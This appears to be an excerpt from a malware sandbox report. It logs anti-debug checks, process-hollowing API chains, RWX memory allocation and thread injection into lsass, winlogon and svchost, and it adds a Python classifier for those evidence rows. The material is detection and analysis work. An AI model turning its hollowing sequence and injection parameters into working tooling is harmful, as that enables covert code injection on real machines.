Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (5 occurrences)
Source: C:\Windows\System32\dllhost.exe | Process token adjusted: Debug
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_00000224139084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_0000022413908814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_000002241393CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_00000224139384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\cmd.exe | Code function: 19_2_0000022413938814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\conhost.exe | Code function: 20_2_000002BCD7E3CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\conhost.exe | Code function: 20_2_000002BCD7E384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\conhost.exe | Code function: 20_2_000002BCD7E38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000026504EA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000026504EA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\conhost.exe | Code function: 37_2_0000026504EACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000025DC1AC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000025DC1AC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000025DC1ACCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000025DC1CE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000025DC1CE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000025DC1CECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_00000225DC648814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_00000225DC6484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_00000225DC64CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_00000225DC678814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_00000225DC6784B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\winlogon.exe | Code function: 39_2_00000225DC67CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exe | Code function: 40_2_00000202C0AE84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\lsass.exe | Code function: 40_2_00000202C0AE8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\lsass.exe | Code function: 40_2_00000202C0AECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 41_2_000002A66130CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 41_2_000002A661308814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 41_2_000002A6613084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exe | Code function: 42_2_000002BAAEDCCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exe | Code function: 42_2_000002BAAEDC8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dwm.exe | Code function: 42_2_000002BAAEDC84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exe | Code function: 42_2_000002BAAEE4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\dwm.exe | Code function: 42_2_000002BAAEE48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\dwm.exe | Code function: 42_2_000002BAAEE484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 43_2_0000026A879C84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 43_2_0000026A879C8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 43_2_0000026A879CCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 43_2_0000026A87F484B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 43_2_0000026A87F48814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 43_2_0000026A87F4CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 44_2_00000179537ACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 44_2_00000179537A84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 44_2_00000179537A8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 44_2_00000179537DCD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 44_2_00000179537D84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 44_2_00000179537D8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\wbem\WMIADAP.exe | Code function: 45_2_0000016CE6538814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\wbem\WMIADAP.exe | Code function: 45_2_0000016CE65384B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\wbem\WMIADAP.exe | Code function: 45_2_0000016CE653CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_000002295D56CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_000002295D568814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exe | Code function: 46_2_000002295D5684B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
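Two kinds of evidence are mixed in this section. The deliberate anti-debug behaviour is powershell.exe's ThreadHideFromDebugger and its ProcessDebugPort / ProcessDebugObjectHandle / ProcessDebugFlags queries. The "Code function" rows are different: the same three call chains recur at the same low offsets (...84B0, ...8814, ...CD80) in cmd.exe, conhost.exe, dllhost.exe, winlogon.exe, lsass.exe, svchost.exe, dwm.exe and WMIADAP.exe, at heap-range addresses rather than image addresses, which is consistent with one injected module carrying its own C runtime; the chains match the MSVC CRT fast-fail and GS-failure handlers, so their IsDebuggerPresent reference is compiler boilerplate rather than a debugger check. The classifier below is an added example, not code from the Joe Sandbox report. It covers the row shapes of this section and of the evasion section that follows: it keeps CRT chains apart from real debugger checks, maps the sandbox's labels back to the NtSetInformationThread / NtQueryInformationProcess information classes, recognises the CreateProcessW, WriteProcessMemory, SetThreadContext, ResumeThread order of process hollowing in dllhost.exe's function 38_2_0000000140002434 (with Wow64GetThreadContext / Wow64SetThreadContext for 32-bit targets), and decodes the numeric literals the decompiled RunPE.cs and Unhook.cs pass to the API (12288 = MEM_COMMIT|MEM_RESERVE, 64 = PAGE_EXECUTE_READWRITE, 128 = PROCESS_CREATE_PROCESS, the right needed to name another process as the parent of a new one, which fits the parentProcessId argument). The CRT API set, the constant tables and the hollowing step list are the example's own; the input rows are copied from the report.

```python
import re

# Three row shapes from the report; the regexes accept the raw column-joined form
# ("...cmd.exeCode function: ...") as well as rows with a " | " column separator.
CODE_FN_RE = re.compile(r"^Source:\s*(?P<src>.*?)\s*\|?\s*Code function:\s*(?P<fn>\S+)\s+(?P<chain>.*)$")
API_REF_RE = re.compile(r"Reference to suspicious API methods:\s*(?P<name>\w+)\((?P<args>.*)\)\s*$")
NT_INFO_RE = re.compile(r"(?:Thread information set|Process queried):\s*(?P<cls>\w+)\s*$")

# The MSVC CRT fast-fail / GS-failure handlers call exactly these APIs; a chain that
# stays inside this set is compiler boilerplate rather than a deliberate debugger check.
CRT_FASTFAIL = {
    "IsProcessorFeaturePresent", "RtlCaptureContext", "RtlLookupFunctionEntry",
    "RtlVirtualUnwind", "IsDebuggerPresent", "SetUnhandledExceptionFilter",
    "UnhandledExceptionFilter", "GetCurrentProcess", "TerminateProcess",
}
# Process hollowing, in order: create the host process, write the image, point its
# thread at the new entry, resume it. Win32, Nt or Wow64 variants may appear.
HOLLOWING_STEPS = [
    {"CreateProcessW", "CreateProcessA"},
    {"WriteProcessMemory", "NtWriteVirtualMemory"},
    {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    {"ResumeThread", "NtResumeThread"},
]
# Sandbox label -> (native call behind it, information class, class number).
NT_INFO_CLASSES = {
    "HideFromDebugger":  ("NtSetInformationThread",   "ThreadHideFromDebugger",   0x11),
    "DebugPort":         ("NtQueryInformationProcess", "ProcessDebugPort",         0x07),
    "DebugObjectHandle": ("NtQueryInformationProcess", "ProcessDebugObjectHandle", 0x1E),
    "DebugFlags":        ("NtQueryInformationProcess", "ProcessDebugFlags",        0x1F),
}
# Bit tables for the numeric literals the decompiled RunPE.cs / Unhook.cs pass to the API.
FLAG_TABLES = {
    "allocation": {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x100000: "MEM_TOP_DOWN"},
    "protect": {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE", 0x100: "PAGE_GUARD"},
    "process_access": {0x02: "PROCESS_CREATE_THREAD", 0x08: "PROCESS_VM_OPERATION",
                       0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x40: "PROCESS_DUP_HANDLE",
                       0x80: "PROCESS_CREATE_PROCESS", 0x400: "PROCESS_QUERY_INFORMATION"},
}
API_FLAG_ARGS = {  # api -> {0-based argument index: flag kind}
    "NtAllocateVirtualMemory": {4: "allocation", 5: "protect"},
    "VirtualProtect": {2: "protect"},
    "VirtualProtectEx": {3: "protect"},
    "OpenProcess": {0: "process_access"},
}
INT_RE = re.compile(r"^(0x[0-9A-Fa-f]+|\d+)u?$")   # C# literals such as 12288u, 64u, 128


def contains_ordered(apis, steps):
    """True when one API from each step occurs in this order; other calls may sit between."""
    i = 0
    for api in apis:
        if i < len(steps) and api in steps[i]:
            i += 1
    return i == len(steps)


def classify_chain(apis):
    if contains_ordered(apis, HOLLOWING_STEPS):
        return "process-hollowing"
    if set(apis) <= CRT_FASTFAIL:
        return "crt-boilerplate"
    if {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"} & set(apis):
        return "anti-debug"
    return "other"


def decode_flags(value, table):
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)                # bits the table does not name
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"


def classify_row(line):
    """Return (kind, detail) for one evidence row, or None if it is none of the three shapes."""
    line = line.strip()
    if m := CODE_FN_RE.match(line):
        apis = [a for a in m.group("chain").split(",") if a]
        return classify_chain(apis), m.group("fn")
    if m := API_REF_RE.search(line):
        args = [a.strip() for a in m.group("args").split(",")]
        decoded = {}
        for idx, kind in API_FLAG_ARGS.get(m.group("name"), {}).items():
            if idx < len(args) and (lit := INT_RE.match(args[idx])):
                decoded[idx] = decode_flags(int(lit.group(1), 0), FLAG_TABLES[kind])
        return "api-reference", (m.group("name"), decoded)
    if m := NT_INFO_RE.search(line):
        return "anti-debug", NT_INFO_CLASSES.get(m.group("cls"), ("?", m.group("cls"), None))
    return None


# Constructed input: rows copied from the report (two of them in the raw joined form).
ROWS = [
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe | Thread information set: HideFromDebugger",
    "Source: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exeProcess queried: DebugPort",
    "Source: C:\\Windows\\System32\\cmd.exeCode function: 19_2_000002241390CD80 RtlCaptureContext,RtlLookupFunctionEntry,"
    "RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,",
    "Source: C:\\Windows\\System32\\dllhost.exe | Code function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,"
    "WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,"
    "WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,"
    "WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,"
    "OpenProcess,TerminateProcess,",
    "Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: "
    "NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)",
    "Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: "
    "OpenProcess(128, inheritHandle: false, parentProcessId)",
    "Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs | Reference to suspicious API methods: "
    "VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)",
]

if __name__ == "__main__":
    for row in ROWS:
        print(classify_row(row))
```

The ordered-subsequence check is deliberately loose (other calls may sit between the four steps) so that the VirtualProtectEx and GetThreadContext calls interleaved in the dllhost.exe chain do not hide the pattern; tightening it to adjacency would miss exactly this report.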

HIPS / PFW / Operating System Protection Evasion

Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | .Net Code: Run contains injection code
Source: 36.2.powershell.exe.1c2db260000.14.raw.unpack, RunPE.cs | .Net Code: Run contains injection code
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, Unhook.cs | Reference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
Source: 35.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs | Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Source: C:\Windows\System32\dllhost.exe | Code function: 38_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 2F00000
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: DC612EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: C0AB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 612D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: AEDB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: AED82EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 53772EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D532EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 67D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5B3C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5B392EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: EBFD2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: ECD72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 59072EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 59042EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A9E72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 73162EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 4E862EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 47B32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 473C2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 70062EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6F9D2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 84262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 83BC2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D3FA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: D3F72EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A4182EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: BDF32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C0262EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C9F32EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 645B2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 7B2A2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4F62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 2AB42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4ADB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 1992EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 25DA2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F5352EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F0D62EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FFB2EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C2572EBC
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8BCF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5DA72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 66902EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 199D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13FF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8D572EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B82EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 69B42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC742EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3892EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 621A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 40E42EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2F482EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6532EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8B4B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 27BC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 683D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 32F2EBC
